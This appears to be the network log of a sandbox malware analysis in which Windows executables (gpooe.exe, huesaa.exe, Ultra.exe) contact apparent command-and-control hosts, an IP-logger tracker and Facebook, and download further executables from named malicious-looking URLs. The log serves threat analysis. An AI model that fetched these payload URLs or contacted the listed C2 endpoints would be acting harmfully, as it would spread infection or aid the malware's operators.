Sec-Fetch-User: ?1
Upgrade-Insecure-Requests: 1
Host: www.facebook.com

Response

HTTP/1.1 200 OK

content-security-policy: default-src facebook.com *.facebook.com fbcdn.net *.fbcdn.net fbsbx.com *.fbsbx.com cdninstagram.com *.cdninstagram.com data: blob: 'self';script-src *.facebook.com *.fbcdn.net 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src data: blob: 'unsafe-inline' facebook.com *.facebook.com fbcdn.net *.fbcdn.net fbsbx.com *.fbsbx.com cdninstagram.com *.cdninstagram.com;connect-src *.facebook.com facebook.com *.fbcdn.net wss://*.facebook.com:* attachment.fbsbx.com blob: *.cdninstagram.com 'self';block-all-mixed-content;upgrade-insecure-requests;report-uri https://www.facebook.com/csp/reporting/?m=c;
Cache-Control: private, no-cache, no-store, must-revalidate
X-Frame-Options: DENY
X-XSS-Protection: 0
Strict-Transport-Security: max-age=15552000; preload
X-Content-Type-Options: nosniff
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Vary: Accept-Encoding
Pragma: no-cache
x-fb-rlafr: 0
Content-Type: text/html; charset="utf-8"
X-FB-Debug: UrpjCW0ZGD8BZUTi4+rAZyXzEBl7Q4I29MUDGc9gREyRgKCnb7fpYM3HJlkh7vo4C45cMEd9099A7OxCJQqUpQ==
Date: Wed, 05 May 2021 17:45:48 GMT
Priority: u=3,i
Transfer-Encoding: chunked
Alt-Svc: h3-29=":443"; ma=3600,h3-27=":443"; ma=3600
Connection: keep-alive
DNS

uyyge5w3ye.2ihsfa.com

gpooe.exe

Remote address:

8.8.8.8:53

Request

uyyge5w3ye.2ihsfa.com

IN A

Response

uyyge5w3ye.2ihsfa.com

IN A

207.246.80.14
GET

http://uyyge5w3ye.2ihsfa.com/api/fbtime

gpooe.exe

Remote address:

207.246.80.14:80

Request

GET /api/fbtime HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
Host: uyyge5w3ye.2ihsfa.com

Response

HTTP/1.1 200 OK

Server: nginx
Date: Wed, 05 May 2021 17:45:49 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/7.3.23
POST

http://uyyge5w3ye.2ihsfa.com/api/?sid=44468&key=1548aad1d152e997a9db96baa5cfef10

gpooe.exe

Remote address:

207.246.80.14:80

Request

POST /api/?sid=44468&key=1548aad1d152e997a9db96baa5cfef10 HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
Content-Length: 266
Host: uyyge5w3ye.2ihsfa.com

Response

HTTP/1.1 200 OK

Server: nginx
Date: Wed, 05 May 2021 17:45:49 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/7.3.23
DNS

iplogger.org

huesaa.exe

Remote address:

8.8.8.8:53

Request

iplogger.org

IN A

Response

iplogger.org

IN A

88.99.66.31
GET

https://iplogger.org/18hh57

gpooe.exe

Remote address:

88.99.66.31:443

Request

GET /18hh57 HTTP/1.1
Connection: Keep-Alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
viewport-width: 1920
Host: iplogger.org

Response

HTTP/1.1 200 OK

Server: nginx
Date: Wed, 05 May 2021 17:45:49 GMT
Content-Type: image/png
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=p0kpv6pr7vbpqdadpfv1c5ea53; path=/; HttpOnly
Pragma: no-cache
Set-Cookie: clhf03028ja=154.61.71.13; expires=Wed, 18-Jul-2029 05:49:51 GMT; Max-Age=258811442; path=/
Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Answers: 1
whoami: d4acea7b6fcc1911bb9f1914a2537b163a3dff6bb0167ceb12feffc6fbc49471
Strict-Transport-Security: max-age=31536000; preload
X-Frame-Options: DENY
GET

https://www.facebook.com/

huesaa.exe

Remote address:

157.240.201.35:443

Request

GET / HTTP/1.1
Connection: Keep-Alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
viewport-width: 1920
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Upgrade-Insecure-Requests: 1
Host: www.facebook.com

Response

HTTP/1.1 200 OK

content-security-policy: default-src facebook.com *.facebook.com fbcdn.net *.fbcdn.net fbsbx.com *.fbsbx.com cdninstagram.com *.cdninstagram.com data: blob: 'self';script-src *.facebook.com *.fbcdn.net 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src data: blob: 'unsafe-inline' facebook.com *.facebook.com fbcdn.net *.fbcdn.net fbsbx.com *.fbsbx.com cdninstagram.com *.cdninstagram.com;connect-src *.facebook.com facebook.com *.fbcdn.net wss://*.facebook.com:* attachment.fbsbx.com blob: *.cdninstagram.com 'self';block-all-mixed-content;upgrade-insecure-requests;report-uri https://www.facebook.com/csp/reporting/?m=c;
Cache-Control: private, no-cache, no-store, must-revalidate
X-Frame-Options: DENY
X-XSS-Protection: 0
Strict-Transport-Security: max-age=15552000; preload
X-Content-Type-Options: nosniff
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Vary: Accept-Encoding
Pragma: no-cache
x-fb-rlafr: 0
Content-Type: text/html; charset="utf-8"
X-FB-Debug: Z2tsojNWEMs51pPqifhbY6oAenAqNaDm0SRCQCGLReb9CAIQRJrwn7pwMji5MTPJxD2p5GhTWyqFYcq2IuHxmQ==
Date: Wed, 05 May 2021 17:45:59 GMT
Priority: u=3,i
Transfer-Encoding: chunked
Alt-Svc: h3-29=":443"; ma=3600,h3-27=":443"; ma=3600
Connection: keep-alive
DNS

uehge4g6gh.2ihsfa.com

huesaa.exe

Remote address:

8.8.8.8:53

Request

uehge4g6gh.2ihsfa.com

IN A

Response

uehge4g6gh.2ihsfa.com

IN A

207.246.80.14
GET

http://uehge4g6gh.2ihsfa.com/api/fbtime

huesaa.exe

Remote address:

207.246.80.14:80

Request

GET /api/fbtime HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
Host: uehge4g6gh.2ihsfa.com

Response

HTTP/1.1 200 OK

Server: nginx
Date: Wed, 05 May 2021 17:46:01 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/7.3.23
POST

http://uehge4g6gh.2ihsfa.com/api/?sid=44582&key=24439a4fc10ef4eb063d36589c7dd6fd

huesaa.exe

Remote address:

207.246.80.14:80

Request

POST /api/?sid=44582&key=24439a4fc10ef4eb063d36589c7dd6fd HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
Content-Length: 265
Host: uehge4g6gh.2ihsfa.com

Response

HTTP/1.1 200 OK

Server: nginx
Date: Wed, 05 May 2021 17:46:01 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/7.3.23
GET

https://iplogger.org/18hh57

huesaa.exe

Remote address:

88.99.66.31:443

Request

GET /18hh57 HTTP/1.1
Connection: Keep-Alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
viewport-width: 1920
Host: iplogger.org

Response

HTTP/1.1 200 OK

Server: nginx
Date: Wed, 05 May 2021 17:46:01 GMT
Content-Type: image/png
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=uc972bnii10v857o4kgo6rp6i2; path=/; HttpOnly
Pragma: no-cache
Set-Cookie: clhf03028ja=154.61.71.13; expires=Wed, 18-Jul-2029 05:49:51 GMT; Max-Age=258811430; path=/
Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Answers: 3
whoami: d4acea7b6fcc1911bb9f1914a2537b163a3dff6bb0167ceb12feffc6fbc49471
Strict-Transport-Security: max-age=31536000; preload
X-Frame-Options: DENY
DNS

999080321test51-service10020125999080321.xyz

Remote address:

8.8.8.8:53

Request

999080321test51-service10020125999080321.xyz

IN A

Response

999080321test51-service10020125999080321.xyz

IN A

45.139.187.152
POST

http://999080321test51-service10020125999080321.xyz/

Remote address:

45.139.187.152:80

Request

POST / HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://999080321test51-service10020125999080321.xyz/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 109
Host: 999080321test51-service10020125999080321.xyz

Response

HTTP/1.1 404 Not Found

Server: nginx
Date: Wed, 05 May 2021 17:47:05 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 7
Connection: keep-alive
Keep-Alive: timeout=3
DNS

www.profitabletrustednetwork.com

Remote address:

8.8.8.8:53

Request

www.profitabletrustednetwork.com

IN A

Response

www.profitabletrustednetwork.com

IN A

192.243.59.12

www.profitabletrustednetwork.com

IN A

192.243.59.20

www.profitabletrustednetwork.com

IN A

192.243.59.13
GET

https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad

MicrosoftEdgeCP.exe

Remote address:

192.243.59.12:443

Request

GET /b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad HTTP/1.1
Accept: text/html, application/xhtml+xml, image/jxr, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
Accept-Encoding: gzip, deflate, br
Host: www.profitabletrustednetwork.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Server: nginx/1.17.6
Date: Wed, 05 May 2021 17:50:31 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: u_pl=14576783; expires=Thu, 06 May 2021 17:50:31 GMT
Set-Cookie: ain=eyJhbGciOiJIUzI1NiJ9.eyJwIjp7ImlkIjoxNDU3Njc4MywiayI6IjdlODcyZGFiOTlkNzhiZmZjNGFhMGMxZTZiMDYyZGFkIiwic2lkIjoiIiwiaXNpZCI6MiwiYXNpZCI6MSwiemlkIjoxMDY0NzcsInBpZCI6ODUxNTUsImFuIjp0cnVlLCJsYW4iOnRydWUsImNpZCI6MTcsImFpZCI6MjgsInB0Ijo0LCJwayI6ImIxZnNtZGQ5bSIsImNwa3MiOnsgIjM0IjoiYTU4ZjNkZjBiOGUxNWM5Yzk4MmNiMDc0ZGUyNjgzZWYifSwidCI6MX0sInUiOnsidSI6MSwiYXUiOjEsImQiOnsiaWQiOjYwMzc2NywiaWRzIjoiIiwiaWMiOmZhbHNlLCJuIjoiRGVza3RvcHxFbXVsYXRvciIsInYiOiJVbmtub3duIiwibSI6IlVua25vd24iLCJmIjoxLCJmbiI6IkRlc2t0b3AiLCJvaWQiOjM4OTE0LCJvbiI6IldpbmRvd3MiLCJvdiI6IjEwLjAiLCJiaWQiOjY4MDAxLCJibiI6IkVkZ2UiLCJidiI6IjE1Iiwid3YiOmZhbHNlLCJlIjpmYWxzZSwiYWIiOmZhbHNlfSwiYyI6eyJpZCI6MjIzLCJjIjoiVVMiLCJuIjoiVW5pdGVkIFN0YXRlcyJ9LCJhIjpmYWxzZSwiY3IiOnsibiI6IkNvZ2VudCBDb21tdW5pY2F0aW9ucyJ9LCJ4ZiI6IiIsIml4ZiI6ZmFsc2UsImlneGYiOmZhbHNlLCJ1cCI6dHJ1ZSwiciI6IiJ9fQ.zSzqFXOc-ReMjzaDNv_HybfTdwdxzUhLVp19wxeCfpc; expires=Wed, 05 May 2021 17:51:31 GMT
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache
X-Request-ID: b9c4016eb7896397c4891211fa38148a
Strict-Transport-Security: max-age=0; includeSubdomains
Content-Encoding: gzip
DNS

venetrigni.com

Remote address:

8.8.8.8:53

Request

venetrigni.com

IN A

Response

venetrigni.com

IN A

54.159.127.84

venetrigni.com

IN A

34.194.100.165

venetrigni.com

IN A

52.72.111.72

venetrigni.com

IN A

34.231.55.2

venetrigni.com

IN A

54.210.223.232

venetrigni.com

IN A

54.159.227.166
GET

https://venetrigni.com/stats

MicrosoftEdgeCP.exe

Remote address:

54.159.127.84:443

Request

GET /stats HTTP/2.0
host: venetrigni.com
accept: */*
origin: https://www.profitabletrustednetwork.com
referer: https://www.profitabletrustednetwork.com/b1fsmdd9m?key=0f22c1fd609f13cb7947c8cabfe1a90d&submetric=14576783
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

date: Wed, 05 May 2021 17:50:32 GMT
content-type: text/html; charset=UTF-8
content-length: 40
server: fasthttp
access-control-allow-origin: https://www.profitabletrustednetwork.com
access-control-allow-credentials: true
set-cookie: uid_id2=592da16e-77ef-445c-b932-399ca3fa3096:3:1; expires=Sat, 03 May 2031 17:50:32 GMT; secure; SameSite=None
GET

https://www.profitabletrustednetwork.com/favicon.ico

MicrosoftEdge.exe

Remote address:

192.243.59.12:443

Request

GET /favicon.ico HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate, br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
Host: www.profitabletrustednetwork.com
DNT: 1
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Server: nginx/1.17.6
Date: Wed, 05 May 2021 17:50:32 GMT
Content-Type: image/x-icon
Content-Length: 0
Connection: keep-alive
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache
X-Request-ID: 0ff58c2fce1225af997661d3c9c0fcdc
Strict-Transport-Security: max-age=0; includeSubdomains
DNS

www.facebook.com

huesaa.exe

Remote address:

8.8.8.8:53

Request

www.facebook.com

IN A

Response

www.facebook.com

IN CNAME

star-mini.c10r.facebook.com

star-mini.c10r.facebook.com

IN A

31.13.83.36
GET

https://www.facebook.com/

gpooe.exe

Remote address:

31.13.83.36:443

Request

GET / HTTP/1.1
Connection: Keep-Alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
viewport-width: 1920
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Upgrade-Insecure-Requests: 1
Host: www.facebook.com

Response

HTTP/1.1 200 OK

content-security-policy: default-src facebook.com *.facebook.com fbcdn.net *.fbcdn.net fbsbx.com *.fbsbx.com cdninstagram.com *.cdninstagram.com data: blob: 'self';script-src *.facebook.com *.fbcdn.net 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src data: blob: 'unsafe-inline' facebook.com *.facebook.com fbcdn.net *.fbcdn.net fbsbx.com *.fbsbx.com cdninstagram.com *.cdninstagram.com;connect-src *.facebook.com facebook.com *.fbcdn.net wss://*.facebook.com:* attachment.fbsbx.com blob: *.cdninstagram.com 'self';block-all-mixed-content;upgrade-insecure-requests;report-uri https://www.facebook.com/csp/reporting/?m=c;
Cache-Control: private, no-cache, no-store, must-revalidate
X-Frame-Options: DENY
X-XSS-Protection: 0
Strict-Transport-Security: max-age=15552000; preload
X-Content-Type-Options: nosniff
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Vary: Accept-Encoding
Pragma: no-cache
x-fb-rlafr: 0
Content-Type: text/html; charset="utf-8"
X-FB-Debug: KpKUU6AtoRE9xQyKQ7ZNRvOAGkmz1Z9LeC7dqjZBo1WJbWFv4KxelgXQxu09ETT93ijozWNxQTEPkrF74RPkMw==
Date: Wed, 05 May 2021 17:55:52 GMT
Transfer-Encoding: chunked
Alt-Svc: h3-29=":443"; ma=3600,h3-27=":443"; ma=3600
Connection: keep-alive
GET

http://uyyge5w3ye.2ihsfa.com/api/fbtime

gpooe.exe

Remote address:

207.246.80.14:80

Request

GET /api/fbtime HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
Host: uyyge5w3ye.2ihsfa.com

Response

HTTP/1.1 200 OK

Server: nginx
Date: Wed, 05 May 2021 17:55:53 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/7.3.23
POST

http://uyyge5w3ye.2ihsfa.com/api/?sid=48842&key=225ee54776f9c58e105661b3f250ad37

gpooe.exe

Remote address:

207.246.80.14:80

Request

POST /api/?sid=48842&key=225ee54776f9c58e105661b3f250ad37 HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
Content-Length: 266
Host: uyyge5w3ye.2ihsfa.com

Response

HTTP/1.1 200 OK

Server: nginx
Date: Wed, 05 May 2021 17:55:53 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/7.3.23
GET

https://iplogger.org/18hh57

gpooe.exe

Remote address:

88.99.66.31:443

Request

GET /18hh57 HTTP/1.1
Connection: Keep-Alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
viewport-width: 1920
Host: iplogger.org

Response

HTTP/1.1 200 OK

Server: nginx
Date: Wed, 05 May 2021 17:55:53 GMT
Content-Type: image/png
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=uj97op442qvms6fc6gf4chsni6; path=/; HttpOnly
Pragma: no-cache
Set-Cookie: clhf03028ja=154.61.71.13; expires=Wed, 18-Jul-2029 05:49:51 GMT; Max-Age=258810838; path=/
Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Answers: 1
whoami: d4acea7b6fcc1911bb9f1914a2537b163a3dff6bb0167ceb12feffc6fbc49471
Strict-Transport-Security: max-age=31536000; preload
X-Frame-Options: DENY
GET

https://www.facebook.com/

huesaa.exe

Remote address:

31.13.83.36:443

Request

GET / HTTP/1.1
Connection: Keep-Alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
viewport-width: 1920
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Upgrade-Insecure-Requests: 1
Host: www.facebook.com

Response

HTTP/1.1 200 OK

content-security-policy: default-src facebook.com *.facebook.com fbcdn.net *.fbcdn.net fbsbx.com *.fbsbx.com cdninstagram.com *.cdninstagram.com data: blob: 'self';script-src *.facebook.com *.fbcdn.net 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src data: blob: 'unsafe-inline' facebook.com *.facebook.com fbcdn.net *.fbcdn.net fbsbx.com *.fbsbx.com cdninstagram.com *.cdninstagram.com;connect-src *.facebook.com facebook.com *.fbcdn.net wss://*.facebook.com:* attachment.fbsbx.com blob: *.cdninstagram.com 'self';block-all-mixed-content;upgrade-insecure-requests;report-uri https://www.facebook.com/csp/reporting/?m=c;
Cache-Control: private, no-cache, no-store, must-revalidate
X-Frame-Options: DENY
X-XSS-Protection: 0
Strict-Transport-Security: max-age=15552000; preload
X-Content-Type-Options: nosniff
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Vary: Accept-Encoding
Pragma: no-cache
x-fb-rlafr: 0
Content-Type: text/html; charset="utf-8"
X-FB-Debug: Y9NFKj33lLWR3jLssTRO++IQ09mwa3fBXqQM1188OykH1aTFTT1ZED/bqotuplwg8fMi2XescgO/AuBQ24rUDg==
Date: Wed, 05 May 2021 17:56:03 GMT
Priority: u=3,i
Transfer-Encoding: chunked
Alt-Svc: h3-29=":443"; ma=3600,h3-27=":443"; ma=3600
Connection: keep-alive
GET

http://uehge4g6gh.2ihsfa.com/api/fbtime

huesaa.exe

Remote address:

207.246.80.14:80

Request

GET /api/fbtime HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
Host: uehge4g6gh.2ihsfa.com

Response

HTTP/1.1 200 OK

Server: nginx
Date: Wed, 05 May 2021 17:56:05 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/7.3.23
POST

http://uehge4g6gh.2ihsfa.com/api/?sid=48938&key=a6aac9d2c47352695c1abebb8a1a01f0

huesaa.exe

Remote address:

207.246.80.14:80

Request

POST /api/?sid=48938&key=a6aac9d2c47352695c1abebb8a1a01f0 HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
Content-Length: 265
Host: uehge4g6gh.2ihsfa.com

Response

HTTP/1.1 200 OK

Server: nginx
Date: Wed, 05 May 2021 17:56:05 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/7.3.23
GET

https://iplogger.org/18hh57

huesaa.exe

Remote address:

88.99.66.31:443

Request

GET /18hh57 HTTP/1.1
Connection: Keep-Alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
viewport-width: 1920
Host: iplogger.org

Response

HTTP/1.1 200 OK

Server: nginx
Date: Wed, 05 May 2021 17:56:05 GMT
Content-Type: image/png
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=lc8pci42hf52uq49irqpk8c0m2; path=/; HttpOnly
Pragma: no-cache
Set-Cookie: clhf03028ja=154.61.71.13; expires=Wed, 18-Jul-2029 05:49:51 GMT; Max-Age=258810826; path=/
Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Answers: 4
whoami: d4acea7b6fcc1911bb9f1914a2537b163a3dff6bb0167ceb12feffc6fbc49471
Strict-Transport-Security: max-age=31536000; preload
X-Frame-Options: DENY
POST

http://999080321test51-service10020125999080321.xyz/

Remote address:

45.139.187.152:80

Request

POST / HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://999080321test51-service10020125999080321.xyz/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 109
Host: 999080321test51-service10020125999080321.xyz

Response

HTTP/1.1 404 Not Found

Server: nginx
Date: Wed, 05 May 2021 17:57:14 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 7
Connection: keep-alive
Keep-Alive: timeout=3

199.188.201.83:80

http://global-sc-ltd.com/EbBkqVdkm4Ebeb_EXes_nhQRrZqYVKhyGK8YF2zAUuC3J/C_Blazer_Sha/UltraMediaBurner.exe

http

Install.tmp

10.7kB
326.7kB
224
220

HTTP Request

HEAD http://global-sc-ltd.com/EbBkqVdkm4Ebeb_EXes_nhQRrZqYVKhyGK8YF2zAUuC3J/C_Blazer_Sha/UltraMediaBurner.exe

HTTP Response

200

HTTP Request

GET http://global-sc-ltd.com/EbBkqVdkm4Ebeb_EXes_nhQRrZqYVKhyGK8YF2zAUuC3J/C_Blazer_Sha/UltraMediaBurner.exe

HTTP Response

200
162.0.210.44:443

https://connectini.net/Series/SuperNitou.php

tls, http

Ultra.exe

949 B
4.0kB
9
8

HTTP Request

POST https://connectini.net/Series/SuperNitou.php

HTTP Response

200
199.188.201.83:80

http://global-sc-ltd.com/EbBkqVdkm4Ebeb_EXes_nhQRrZqYVKhyGK8YF2zAUuC3J/Widgets/ultramediaburner.exe

http

Ultra.exe

8.7kB
546.7kB
187
366

HTTP Request

GET http://global-sc-ltd.com/EbBkqVdkm4Ebeb_EXes_nhQRrZqYVKhyGK8YF2zAUuC3J/Widgets/ultramediaburner.exe

HTTP Response

200
198.54.126.101:80

http://limesfile.com/Ea42LhC7KVL6GEpzgxwW/C_Net_8Rpjkd5GEqRYJq87/xuqczuydmga4p4c.exe

http

Ultra.exe

6.8kB
392.2kB
140
264

HTTP Request

GET http://limesfile.com/Ea42LhC7KVL6GEpzgxwW/C_Net_8Rpjkd5GEqRYJq87/xYW2RW5ePv.exe

HTTP Response

200

HTTP Request

